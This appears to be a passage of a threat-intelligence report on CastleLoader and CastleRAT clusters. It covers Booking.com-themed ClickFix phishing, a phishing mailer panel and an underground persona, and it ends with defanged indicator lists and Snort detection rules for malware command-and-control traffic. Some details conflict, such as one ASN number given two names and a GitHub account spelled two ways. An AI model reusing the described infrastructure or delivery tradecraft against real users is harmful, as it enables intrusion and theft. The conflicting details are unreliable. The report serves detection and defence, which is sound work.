In September 2024, Proofpoint reported on an unattributed activity cluster observed since at least May 2024. The threat actors targeted transportation and logistics companies in North America to distribute various malware families, including LummaC2, StealC, and NetSupport RAT, as well as remote monitoring and management (RMM) tools such as SimpleHelp, PDQ Connect, Fleetdeck, and ScreenConnect. The campaigns employed several techniques: The threat actors compromised legitimate email accounts belonging to transportation and shipping companies, injecting malicious content into existing email threads to enhance credibility. They also used compromised accounts on DAT Freight & Analytics and Loadlink platforms to post fraudulent load listings containing malicious URLs leading to RMM downloads. Lastly, they launched broader phishing waves that directed recipients to staging web pages hosting RMM installers. Most campaigns involved Google Drive URLs or attached .URL shortcut files that, when executed, used SMB to retrieve an executable from a remote share, leading to malware installation.

While Insikt Group has not identified direct technical overlaps (for example, shared infrastructure), the similar targeting and partially overlapping tactics, particularly the use of DAT Freight & Analytics and Loadlink, suggest a possible connection between this activity cluster and Cluster 1 (this is a low-confidence assessment).

Notably, in November 2025, Proofpoint reported again on a possibly related activity where cybercriminals targeted trucking and logistics companies using RMM tools to hijack shipments. The attackers lured victims through fake load postings or compromised email threads, delivering malware or RMM software to gain access. This campaign highlights the growing convergence of cyber and physical cargo theft as criminals exploit digital logistics systems.

Cluster 2: Matanbuchus and Mailer Tool Activity Tracked as TAG-161

Cluster 2, tracked as TAG-161, has been active since at least June 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com and employs ClickFix techniques. It primarily delivers CastleLoader and other payloads, including Matanbuchus. Notably, Insikt Group observed this cluster using Matanbuchus. Evidence indicates that the cluster relies mainly on threat actor-controlled infrastructure. Furthermore, Insikt Group identified a previously unreported phishing email management tooling, which appears to be used by threat actors linked to Cluster 2.

Matanbuchus Activity and Booking.com-Themed Infrastructure

Alongside CastleLoader, several Matanbuchus samples were distributed through Booking.com-themed ClickFix campaigns associated with Cluster 2. Notably, Insikt Group had previously reported Matanbuchus activity linked to CastleRAT in an earlier publication, where the Matanbuchus C2 panel was hosted on the adjacent IP address, 185[.]39[.]19[.]164 (see Figure 16).

Figure 16: Matanbuchus panel on 185[.]39[.]19[.]164 (Source: Recorded Future)

Matanbuchus is a C-based downloader MaaS available since 2021. One of its primary objectives is secrecy, which is in part fostered by limiting sales to a select number of customers. Currently at version three, it is continually maintained and improved by its creator BelialDemon. BelialDemon offers Matanbuchus 3.0 as a monthly rental service with two pricing tiers based on the communication protocol: $10,000 per month for the HTTPS-based version and $15,000 per month for the DNS-based version.

Recorded Future Malware Intelligence’s most recent Matanbuchus sample at the time of writing communicated with its C2 server at mechiraz[.]com, a domain behind Cloudflare but linked to the IP address 5[.]178[.]1[.]8 (TRIBEKA-AS, PA; AS211059). This IP address was also associated with the domain nicewk[.]com, previously reported by Morphisec. Historical analysis of the same IP revealed several additional Matanbuchus C2 domains, including galaxioflow[.]com and nimbusvaults[.]com.

Additional Booking.com-Themed Infrastructure

By analyzing the same /24 CIDR range that hosted the Matanbuchus infrastructure during the period of observed activity, Insikt Group identified additional IP addresses and domains linked to Booking.com-themed ClickFix operations. These network indicators, detailed in Appendix D, are tracked by Insikt Group as part of Cluster 2.

Phishing Email Management Tooling

By analyzing the IP addresses hosting the domains listed in Appendix D, Insikt Group identified three that stood out for each hosting three previously unreported websites or management panels operating on high ports. The panels featured the following HTML titles: “Менеджер Email”, “Менеджер Редиректов и рассылок”, and “Менеджер Редиректов и Email” (translated as “Redirect and Email Manager”). Based on their visual appearance, technical implementation, and thematic focus, Insikt Group assesses that these websites are used in tandem as part of campaigns specifically targeting Booking.com.

Website 1: Redirect and Email Manager (“Менеджер Редиректов и Email”)

The first website, hosted on port 56723, serves as a web-based interface for managing bulk redirections and email campaigns (see Figure 17). It integrates redirect generation, SMTP configuration, and email distribution capabilities within a single dashboard. The design, terminology, and functionality closely align with those typically observed in malspam or phishing infrastructure management panels.

Figure 17: Page linked to “Redirect and Email Manager” tool (Source: Recorded Future)

Within the document object model (DOM) of the website, Insikt Group identified two email addresses, with one of them being likely a compromised account used to send phishing emails. At the time of discovery, the rambler email address, likely a burner account, appeared within the page’s SMTP configuration with associated credentials, indicating its use as the primary sender account for automated bulk email delivery, consistent with the panel’s design for coordinated phishing or spam distribution. The DOM also contained an AWS access key.

Additionally, the DOM referenced a set of domains, some of which are listed in Appendix D, while others were newly identified and are listed in Appendix E. By searching for the phrase “Сервис редиректов работает для [domain]” (translated as “The redirect service works for [domain]”), Insikt Group discovered further related domains, likewise shown in Appendix E.

Website 2: Email Manager (“Менеджер Email”)

The second website, hosted on port 56724, closely resembles the first “Redirect and Mailing Manager” panel but exhibits several notable configuration differences (see Figure 18). These include a distinct AWS username, an SMTP sender address, bred[@]booking-porta[.]com, as well as different logging settings and a few additional indicators of compromise. Furthermore, the website specified 109[.]104[.]153[.]87 as its proxy server.

Figure 18: Page linked to “Email Manager” tool (Source: Recorded Future)

Website 3: Booking-Mailer V2.2 (“Менеджер Редиректов и рассылок”)

The third website, hosted on port 56725, features a substantially larger DOM and functions as a combined redirect generator and mass-mailing platform (see Figure 19). The user interface exposes key capabilities, including domain selection, subdomain base-name configuration, HTML email templating (supporting URL placeholders for generated redirects), target file uploads, worker/thread management, SMTP pool configuration and validation, proxy editing, and real-time logging and statistics. Redirects are constructed using a domain and base name to generate unique subdomain links following the format: [identifier].[base_name].[main_domain].

Figure 19: Page linked to “Booking-Mailer V2.2” tool (Source: Recorded Future)

The domains site-riko[.]com, site-sero[.]com, site-silo[.]com, site-tiko[.]com, and site-filo[.]com are all referenced within the DOM.

Notably, within the “debug logs” in the DOM of the website, Insikt Group found a range of proxy servers with varying high ports. The IP addresses are listed in Table 1.

Table 1: Proxy IP addresses found in DOM of “Booking-Mailer V2.2” tool (Source: Recorded Future)

Insikt Group identified additional instances of the Phishing Email Management Tooling, all hosted on IP addresses announced by the same set of Autonomous Systems (ASes). The identified IP addresses are listed in Table 2. The domains hosted on these IP addresses are listed in Appendix H.

Table 2: Additional infrastructure instances of the Phishing Email Management Tooling (Source: Recorded Future)

ASN Cluster Possibly Linked to Bearhost

Insikt Group observed significant infrastructure activity associated with AS216341 (STIMUL-AS) and AS216341 (OPTIMA-AS) throughout this research. Both ASes were established on March 11, 2025, and have demonstrated consistent malicious activity since their inception. According to researchers at DeepCode, these providers maintain strong links to the BEARHOST bulletproof hosting network, a known enabler of malicious cyber operations. BEARHOST and associated providers have reportedly serviced ransomware operations, including LockBit, Conti, MedusaLocker, as well as sanctioned entities such as Garantex, Lazarus Group, Zservers, and Nobitex. That same research further identified malicious activity and customer bases linked to both AS211659 and AS216341, consistent with Insikt Group’s own observations of Lumma, Rhadamanthys, and Matanbuchus within these autonomous systems. This overlap in observed threats reinforces the assessment that both autonomous systems are part of a broader BEARHOST-aligned infrastructure ecosystem supporting financially motivated cyber operations.

Infrastructure Similarities with TAG-157 (RefBroker)

Insikt Group has previously reported on threat actors impersonating Booking.com, including TAG-157, also known as RefBroker. Notably, domains associated with TAG-157 have been observed hosted on IP address 77[.]83[.]207[.]56, adjacent to 77[.]83[.]207[.]55, with the latter being part of TAG-161’s infrastructure. More broadly, both TAG-157 and TAG-161 appear to favor the same set of ASNs discussed in the section ASN Cluster Possibly Linked to Bearhost. At present, however, the exact relationship between TAG-157 and TAG-161 remains unclear.

Cluster 3: Booking.com Impersonation Activity

Cluster 3 has been active since at least March 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com, ClickFix techniques, and uses Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader. Although the techniques appear similar to those described in Cluster 2, Insikt Group has not identified any technical overlaps between Clusters 2 and 3 at this time.

Infrastructure Analysis

Insikt Group noted a CastleRAT sample that leveraged a Booking.com phishing domain, update-info4468765[.]com (see Figure 20). The phishing domain tricks users into running a malicious PowerShell command (via ClickFix techniques) that downloads a second-stage script from boiksal[.]com/upd. This script retrieves and executes a .NET loader that repeatedly spawns new PowerShell processes to add Windows Defender exclusions for the eventual payload (update.exe) using a User Account Control (UAC) prompt flooding loop to bypass analysis sandboxes and security controls. Once exclusions are applied, the loader decrypts and launches the CastleLoader payload, which then reaches out to its C2 domain, programsbookss[.]com, resolved through a Steam Community profile. The use of Steam Community profiles allows attackers to update infrastructure dynamically without redeploying malware (see Figure 21). CastleRAT samples that use Steam for deaddrops may sometimes contain a hard-coded backup C2 in the event the deaddrop C2 retrieval fails. A list of all observed Steam Community profiles and the various C2 domains observed on each is found in Appendix F.

Figure 20: GrayBravo’s CastleRAT using Steam Community for dead drop resolving (Source: Steam)

At the time of analysis, update-info4468765[.]com and boiksal[.]com were both hosted on 178[.]17[.]57[.]103, while the Steam-resolved C2 domain, programsbookss[.]com, was hosted on an adjacent IP, 178[.]17[.]57[.]102. This close placement within the same /24 subnet suggests that the operators likely acquired these IP addresses around the same time. It also suggests that they were assigned sequentially by the hosting provider, Global Connectivity Solutions (AS215540). A similar pattern was later observed across the 192[.]109[.]138[.]0/24 range, where Booking.com-themed phishing domains were hosted on 192[.]109[.]138[.]103 and the Steam-resolved C2 domains, programsbookss[.]com and justnewdmain[.]com, were hosted on 192[.]109[.]138[.]102.

Figure 21: Booking.com-themed ClickFix linked to Cluster 3 (Source: Recorded Future)

When scanned, the Booking.com-themed domains typically return either a Cloudflare-themed turnstile page or a “turnstile token missing” error message (1, 2). Further pivoting from the domain boiksal[.]com uncovered a broader cluster of activity encompassing multiple additional domains and IP addresses, most of which appear to be used to impersonate Booking.com. The domains and associated IP addresses are detailed in Appendix G. Notably, while the domains commonly use Cloudflare name servers, many of the domains ultimately resolve to threat actor–controlled IP addresses.

Cluster 4: Malvertising and Fake Software

Cluster 4 has been active since at least April 2025 and remains operational at the time of analysis. This cluster employs malvertising and fake software installers, impersonating legitimate tools such as Zabbix and RVTools, to distribute CastleLoader and NetSupport RAT.

Based on Insik Group observations, the cluster has used CastleLoader C2 infrastructure hosted on domains including wereatwar[.]com. It has also deployed NetSupport RAT samples that communicate with C2 servers at IP addresses such as 37[.]230[.]62[.]235 and 84[.]200[.]81[.]32. Notably, the domain jshanoi[.]com resolved to these NetSupport-associated IP addresses during the period of activity.

The CastleLoader payloads are distributed through fake GitHub repositories and delivered as electronically signed MSI installers, often bearing Extended Validation (EV) certificates, similar to those observed in previous Bumblebee campaigns. These signed builds have been attributed to organizations including LLC KHD GROUP (issued by GlobalSign) and INTYNA EXIM PRIVATE LIMITED (issued by SSL.com), among others. Notably, “Sparja”, an Exploit Forum user discussed below and potentially linked to CastleLoader, has been active in discussions regarding EV certificates earlier this year.

Possible Connection to Exploit Forum User Sparja

Analysis of historical CastleLoader infrastructure identified one anomalous instance that may indicate a link to a threat actor named “Sparja”. A panel hosted on 94[.]159[.]113[.]123 and exposed on port 5050 diverged from established CastleLoader panel characteristics. While known CastleLoader administrative interfaces typically display the HTML title “Castle,” this instance returned the title “Sparja.” Review of the panel’s DOM file revealed that it referenced a CSS file with a filename identical to one observed in verified CastleLoader panels. While the overlap does not constitute a conclusive stylistic correlation, it can suggest potential code reuse or reliance on a shared panel template between CastleLoader and the “Sparja” interface. Insikt Group identified one other Sparja panel with the same HTML title on the IP address 94[.]159[.]113[.]32 (see Figure 22).

Figure 22: Sparja panel (top) and CastleLoader panel (bottom) (Source: Recorded Future)

Activity associated with the alias “Sparja” on the underground Exploit Forum provides additional context for possible connections. Obtained via proprietary means, Insikt Group assesses that Sparja is also active on the top-tier Russian-language forum XSS. Insikt Group bases this assessment on the user’s XSS activity, in which the user viewed similar topics related to malware loaders, EV certificates, and bypass software.

On December 22, 2024, Sparja authored a thread on Exploit Forum, looking to buy or rent a dropper (see Figure 23). In a documented dispute spanning from January to February 2025, Sparja engaged a user known as “ppro” to develop a “private solution, a dropper or loader for an executable file.” The dispute concluded with ppro’s ban from the forum, following a history of earlier account suspensions and reinstatements. Given the timeline of the events, Insikt Group assesses it is unlikely ppr0 had involvement in CastleLoader’s development; however, Sparja’s expressed interest in acquiring a custom loader prior to CastleLoader’s appearance supports the assessment that Sparja was actively pursuing a dropper or loader functionality consistent with CastleLoader’s purpose.

Figure 23: Sparja in search of a dropper or loader on Exploit Forum (Source: Recorded Future)

Forum discussions in October 2025 indicate continued interest in Sparja’s apparent tooling (see Figure 24). A subsequent post sought contact with “the coder who wrote the Sparja dropper,” implying that a distinct dropper associated with Sparja had circulated within the underground market. This activity’s timeline aligns with CastleLoader operations and suggests that Sparja’s development or procurement of loader-type malware was known among peers during the same operational period.

Figure 24: Exploit Forum user “tomri99le” looking for the coder that worked with Sparja (Source: Recorded Future)

A related CastleLoader sample, distributed as an MSI installer, was identified in Bazaar Abuse data as originating from the GitHub account github[.]com/legend123451111. The same account appears in a Cisco Talos report describing a malware-as-a-service (MaaS) ecosystem leveraging GitHub for payload distribution, including malware families such as Amadey and Emmenhtal. Talos noted consistent naming conventions, repository structures, and file types across multiple associated GitHub accounts, with the earliest activity dated to January 2025. The report concluded that the operators of these accounts likely facilitated multi-tenant malware distribution rather than single-threat actor campaigns.

The available evidence does not confirm that Sparja directly participated in the MaaS network described by Talos; however, the CastleLoader sample that originated from github[.]com/legend1234561111, which contained the MSI installer, is linked to the Sparja-named CastleLoader panel, indicating a potential overlap between the GitHub-based distribution channel and infrastructure associated with Sparja. This connection suggests that Sparja may have either used an existing MaaS framework to distribute CastleLoader payloads or operated within the same delivery ecosystem.

On October 27, 2025, Sparja posted a comment on Exploit Forum within a thread advertising eDragon_x’s dropper service, stating that they had been using the service for several months and considered the dropper reliable. This post is notable as it reinforces Sparja’s continued interest in droppers and loaders, a recurring theme in their activity. The post also situates Sparja in proximity to eDragon_x, a threat actor operating within overlapping underground circles that include “tramp”, a known threat actor reportedly identified as Oleg Nefedov. Tramp is associated with a spamming network responsible for distributing Qbot (aka Qakbot) and is identified as the founder of the BlackBasta ransomware group. Tramp was also an affiliate for several ransomware operations, such as REvil and Conti; he also maintained close ties with Rhysida and Cactus.

While there is no direct evidence of collaboration between Sparja and tramp, the shared participation across related forums and service providers like eDragon_x suggests that Sparja operates within a network of threat actors closely associated with major ransomware distribution and loader development ecosystems.

Victimology

Insikt Group identified numerous suspected victim IP addresses communicating with the Tier 1 C2 infrastructure associated with CastleRAT. While the majority of these IP addresses appear to be geolocated in the United States, only a limited number of actual victims could be positively identified. Most victims remain unidentified and cannot be confirmed; however, Insikt Group assesses it is likely that at least some of them represent private individuals who became infected. It is important to note that of the entities Insikt Group identified, the infection might have occurred on individual machines within the network of the victim organization or by using the victim’s WiFi rather than on the organization's network directly. For instance, within the university context, it is likely that some victims are individual machines, such as those used by students, connected to the university's network.

Mitigations

• Leverage the IoCs in Appendix H to investigate potential past or ongoing infections, both successful and attempted, and use the Recorded Future Intelligence Cloud to monitor for future IoCs associated with GrayBravo (formerly tracked as TAG-150), TAG-160, TAG-161, and other threat actors.
• Monitor for validated infrastructure associated with the malware families discussed in this report, including CastleLoader, CastleRAT, Matanbuchus, and numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.
• Leverage Sigma, YARA, and Snort rules provided in Appendices I, J, K, L, M, N, and O in your SIEM or endpoint detection and response (EDR) tools to detect the presence or execution of CastleLoader, CastleRAT, and Matanbuchus. Additionally, use other detection rules available in the Recorded Future Intelligence Cloud.
• Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure. This can be achieved by employing specific queries and filtering the results based on your assets.
• Use the Recorded Future Intelligence Cloud to monitor GrayBravo, TAG-160, TAG-161, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.
• Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to you. For example, if you want to stay informed about activities related to specific personas such as Sparja, you can receive regular AI-generated updates on this threat actor’s activity on Exploit Forum.

Outlook

As anticipated in earlier assessments, GrayBravo has significantly expanded its user base, evidenced by the growing number of threat actors and operational clusters leveraging its CastleLoader malware. This trend highlights how technically advanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within the cybercriminal ecosystem once proven effective. Given GrayBravo’s established history of developing and deploying custom malware families, it is highly likely the group will continue to release new tools and capabilities in the near term, further strengthening its position within the MaaS market.

Among observed activity clusters, TAG-160 stands out for its highly targeted campaigns against the logistics sector. The cluster demonstrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting freight-matching platforms, and mirroring authentic communications to enhance its deception and impact. This indicates an increasing sophistication among niche, sector-specific threat actors who maintain a low profile through minimal footprints and precise targeting.

Insikt Group will continue to closely monitor GrayBravo along with related threat actors, such as TAG-160 and TAG-161, to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.

Appendix A: CastleLoader C2 Servers

(Source: Recorded Future)

Appendix B: Additional Infrastructure Likely Linked to CastleLoader

(Source: Recorded Future)

Appendix C: Logistics-Themed Infrastructure Used by TAG-160

(Source: Recorded Future)

Appendix D: Booking.com-Themed Domains Linked to TAG-161

(Source: Recorded Future)

Appendix E: Additional Infrastructure Linked to “Redirect and Email Manager” Tool

(Source: Recorded Future)

Appendix F: Steam Community Profiles and their Corresponding C2 Domains, alongside the IP Addresses that Hosted the C2 domains

(Source: Recorded Future)

Appendix G: Booking.com-Themed Infrastructure Linked to Cluster 3

(Source: Recorded Future)

Appendix H: Indicators of Compromise (IoCs)

CastleRAT C2 IP Addresses:
5[.]35[.]44[.]176
34[.]72[.]90[.]40
45[.]11[.]180[.]174
45[.]11[.]180[.]198
45[.]11[.]181[.]59
45[.]32[.]69[.]11
45[.]61[.]136[.]81
45[.]134[.]26[.]41
45[.]135[.]232[.]149
45[.]144[.]53[.]62
46[.]28[.]67[.]22
64[.]52[.]80[.]121
66[.]63[.]187[.]224
67[.]217[.]228[.]198
77[.]90[.]153[.]43
77[.]238[.]241[.]203
79[.]132[.]130[.]148
79[.]132[.]131[.]200
85[.]192[.]49[.]6
85[.]208[.]84[.]115
87[.]120[.]93[.]167
91[.]202[.]233[.]132
91[.]202[.]233[.]250
94[.]141[.]122[.]164
102[.]135[.]95[.]102
104[.]225[.]129[.]171
144[.]208[.]126[.]50
168[.]100[.]8[.]84
178[.]17[.]57[.]102
178[.]17[.]57[.]153
185[.]125[.]50[.]125
185[.]149[.]146[.]118
185[.]156[.]248[.]24
185[.]196[.]9[.]80
185[.]196[.]9[.]222
185[.]196[.]10[.]8
185[.]196[.]11[.]171
185[.]208[.]158[.]250
192[.]109[.]138[.]102
192[.]153[.]57[.]125
194[.]76[.]227[.]242
195[.]85[.]115[.]44
195[.]149[.]146[.]118
195[.]201[.]108[.]189
195[.]211[.]97[.]51

CastleRAT C2 Domains:
autryjones[.]com
gabesworld[.]com
justnewdmain[.]com
kakapupuneww[.]com
miteamss[.]com
programsbookss[.]com
tdbfvgwe456yt[.]com
treetankists[.]com

Steam Community URLs:
hxxps[://]steamcommunity[.]com/id/desdsfds34324y3g
hxxps[://]steamcommunity[.]com/id/fio34h8dsh3iufs
hxxps[://]steamcommunity[.]com/id/jeg238r7staf378s
hxxps[://]steamcommunity[.]com/id/krouvhsin34287f7h3
hxxps[://]steamcommunity[.]com/id/tfy5d6gohu8tgy687r7

CastleLoader C2 IP Addresses:
31[.]58[.]50[.]160
31[.]58[.]87[.]132
45[.]11[.]183[.]19
45[.]11[.]183[.]45
45[.]11[.]183[.]165
45[.]155[.]249[.]121
80[.]77[.]25[.]88
80[.]77[.]25[.]114
80[.]77[.]25[.]239
107[.]158[.]128[.]26
147[.]45[.]177[.]127
170[.]130[.]165[.]201
172[.]86[.]90[.]58
173[.]44[.]141[.]52
185[.]121[.]234[.]141

CastleLoader C2 Domains:
alafair[.]net
anotherproject[.]icu
bethschwier[.]com
campanyasoft[.]com
castlppwnd[.]com
donttouchme[.]life
donttouchthisisuseless[.]icu
doyoureallyseeme[.]icu
dpeformse[.]com
icantseeyou[.]icu
oldspicenotsogood[.]shop
rcpeformse[.]com
roject0[.]com
speatly[.]com
touchmeplease[.]icu
wereatwar[.]com

Additional Domains:
albafood[.]shop
albalk[.]lol
bdeskthebest[.]shop
bestproxysale[.]shop
bestvpninfo[.]shop
chessinthenight[.]lol
clgenetics[.]shop
docusign[.]homes
dubaialbafood[.]shop
easyadvicesforyou[.]shop
easyprintscreen[.]shop
funjobcollins[.]shop
nort-secure[.]shop
norton-secure[.]shop
notstablecoin[.]xyz
notusdt[.]lol
nvidblog[.]shop
nvldlainfoblog[.]shop
oldspicenotsogood[.]shop
starkforeveryone[.]lol
sweetdevices[.]lol
testdomain123123[.]shop
tradeviewdesktop[.]shop
tradlngview-desktop[.]biz
tradlngvlewdesktop[.]shop
tradview-desktop[.]shop
vipcinemade[.]shop
vipcinemadubai[.]shop
vipdubaicinema[.]shop

Cluster 1 (TAG-160) Logistics-Themed Domains:
cdlfreightlogistics[.]com
dperforms[.]info
englandloglstics[.]com
englanglogistlcs[.]com
hometownlogisticsllc[.]com
leemanlogisticsinc[.]com
loadplannig[.]com
loads[.]icu
loadsplanning[.]com
loadsschedule[.]com
loadstracking[.]com
loadstrucking[.]com
mcentireinc[.]com
mcloads[.]com
mlxfreightinc[.]com
mrlogsol[.]ca
pinaccletruckllc[.]com
rateconfirmations[.]com
redlightninglogistics[.]com
redlightninglogisticsinc[.]com
starshiplogisticsgroupllc[.]com
tenderloads[.]com
trucksscheduling[.]com

Cluster 1 (TAG-160) IP Addresses Hosting Logistics-Themed Domains:
74[.]119[.]239[.]234
78[.]153[.]155[.]131
162[.]215[.]230[.]96
162[.]215[.]230[.]150
162[.]215[.]241[.]46
162[.]215[.]241[.]215
162[.]251[.]80[.]108
185[.]236[.]20[.]154
192[.]124[.]178[.]74
199[.]79[.]62[.]141
204[.]11[.]58[.]80
207[.]174[.]212[.]141

Matanbuchus C2 IP Addresses:
185[.]39[.]19[.]164

Matanbuchus C2 Domains:
galaxioflow[.]com
mechiraz[.]com
nicewk[.]com
nimbusvaults[.]com

Cluster 2 (TAG-161) Booking.com-Themed Domains:
checkinastayverify[.]com
checkinistayverify[.]com
checkinstayverify[.]com
checkistayverify[.]com
checksstayverify[.]com
checkystayverify[.]com
confirmahotelastay[.]com
confirmahotelstay[.]com
confirmhotelestay[.]com
confirmhotelistay[.]com
confirmhotelystay[.]com
confirmstayon[.]com
confirmstayonline[.]com
confirmyhotelstay[.]com
guestaformahub[.]com
guestaformhub[.]com
guestaformsafe[.]com
guestaportalverify[.]com
guestaverifyportal[.]com
guestformahub[.]com
guestformasafe[.]com
guestformhub[.]com
guestformsafe[.]com
guestistayhotel[.]com
guestportalverify[.]com
gueststayhotel[.]com
guestverifyhub[.]com
guestverifylink[.]com
guestverifyportal[.]com
guestystayhotel[.]com
guesutastayhotel[.]com
guesytastayhotel[.]com
hoteliguestverify[.]com
hotelistayverify[.]com
hotelyguestverify[.]com
hotelystayverify[.]com
nedpihotel[.]com
pilolhotel[.]com
roomiverifaccess[.]com
roomverifaccess[.]com
roomverifiaccess[.]com
servicehotelonline[.]com
verifihubguest[.]com
verifyhubguest[.]com

Cluster 2 (TAG-161) IP Addresses Hosting Booking.com-Themed Domains:
77[.]83[.]207[.]55
185[.]39[.]19[.]180
185[.]39[.]19[.]181

Other Domains Linked to Cluster 2 (TAG-161):
cik-ed[.]com
cut-gv[.]com
dip-bo[.]com
dok-ol[.]com
dut-cd[.]com
eta-cd[.]com
eto-sa[.]com
fir-vp[.]com
for-es[.]com
gir-vc[.]com
gut-bk[.]com
her-op[.]com
ipk-sa[.]com
itp-ce[.]com
kil-it[.]com
kip-er[.]com
mac-ig[.]com
map-nv[.]com
ned-uj[.]com
otr-gl[.]com
pit-kp[.]com
rol-vd[.]com
site-bila[.]com
site-here[.]com
site-reto[.]com
site-tilo[.]com
site-wila[.]com
spu-cr[.]com
tam-cg[.]com
uke-sd[.]com
uki-fa[.]com
wal-ik[.]com
xut-uv[.]com
xyt-ko[.]com
ykl-vh[.]com
yt-ko[.]com
zit-fl[.]com

Proxy IP Addresses Linked to Cluster 2 (TAG-161):
109[.]104[.]153[.]29
109[.]104[.]153[.]100
109[.]104[.]153[.]193
109[.]104[.]154[.]67

Additional IP Addresses Linked to Phishing Email Management Tooling:
80[.]64[.]18[.]245
85[.]208[.]84[.]65
88[.]214[.]50[.]83
185[.]39[.]19[.]94

Cluster 3 Booking.com-Themed Domains:
bioskbd[.]com
blkiesf[.]com
boikfrs[.]com
boiksal[.]com
bookingnewprice109034[.]icu
bookingnewprice204167[.]icu
guest-request16433[.]com
guest-request44565494[.]com
guest-request64533[.]com
guest-request666543[.]com
guest-request677653[.]com
guest-update666532345[.]com
hotelroomprice1039375[.]icu
info-guest44567645[.]com
info676345677[.]com
justnewdmain[.]com
newmessage10294[.]com
programsbookss[.]com
request-info3444[.]com
request-info4433345[.]com
request345553[.]com
request44456776[.]com
update-gues3429[.]com
update-guest4398317809[.]com
update-info14546[.]com
update-info3458421[.]com
update-info4467[.]com
update-info4468765[.]com
update-info539156[.]com
update-info71556[.]com
update-reques898665[.]com

Cluster 3 IP Addresses Hosting Booking.com-Themed Domains:
178[.]17[.]57[.]103
192[.]109[.]138[.]102

Appendix I: Snort Rules for CastleLoader

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleLoader Malware Outbound Checkin"; flow:established,to_server; content:"GET"; http_method; urilen:82,norm; content:"|2F|service|2F|settings|2F|"; http_uri; fast_pattern; content:"Cache-Control|3A 20|no-cache|0D 0A|Connection|3A 20|Keep-Alive|0D 0A|Pragma|3A 20|no-cache|0D 0A|User-Agent|3A 20|"; http_header; depth:79; content:"Host|3A 20|"; http_header; distance:0;  content:!"Accept"; http_header; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost\x3a\x20[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460302; rev:1; metadata:author MGUT, created_at 2025-07-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleLoader Malware Outbound Payload Request"; flow:established,to_server; content:"GET"; http_method; content:"|2F|service|2F|download|2F|"; http_uri; fast_pattern; content:"Cache-Control|3A 20|no-cache|0D 0A|Connection|3A 20|Keep-Alive|0D 0A|Pragma|3A 20|no-cache|0D 0A|User-Agent|3A 20|"; http_header; depth:79; content:"Host|3A 20|"; http_header; distance:0;  content:!"Accept"; http_header; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost\x3a\x20[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460303; rev:1; metadata:author MGUT, created_at 2025-07-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleLoader Malware Stager Outbound Payload Request"; flow:established,to_server; content:"GET"; http_method; content:"|2F|service|2F|download|2F|"; http_uri; depth:18; fast_pattern; content:".bin"; http_uri; content:"GoogeBot"; http_user_agent; depth:8; isdataat:0,relative; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460304; rev:1; metadata:author MGUT, created_at 2025-08-12, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert tcp $EXTERNAL_NET 79 -> $HOME_NET any (msg:"CastleLoader Malware Inbound Command Retrieval via Finger Service"; flow:established,to_client; content:"Login|3A 20|"; depth:7; content:"Plan|3A|"; distance:0; content:"%random%"; fast_pattern; distance:0; content:"|20|--tlsv1.2|20|-L|20|-o|20|"; distance:0; content:"|0D 0A|mkdir|20|"; distance:0; content:"|0D 0A|tar|20|"; distance:0; reference:url,https://tria.ge/251110-zcgvkstpck; classtype:trojan-activity; sid:52460334; rev:2; metadata:author MGUT, created_at 2025-10-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

Appendix J: Snort Rules for CastleRAT

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|02 56 77 8E A5 83 D7 05 02 C2 1E D9 70 5A 47 E5 11 92 B5 5A|"; fast_pattern; depth:20; reference:url,https://tria.ge/250808-w4hpeaxtcw; classtype:trojan-activity; sid:52460307; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|BF CF 04 82 45 DF 4F 09 55 5E 0B 15 9F E2 91 A0 68 51 1E 87|"; fast_pattern; depth:20; reference:url,https://tria.ge/250814-wyqstsyjx3; classtype:trojan-activity; sid:52460308; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|6B 13 5C 08 BD 49 59 75 79 62 4E EA 2F DE 57 F4 6E 08 8B 6B|"; fast_pattern; depth:20; reference:url,https://tria.ge/250219-nsbsqazpep; classtype:trojan-activity; sid:52460309; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

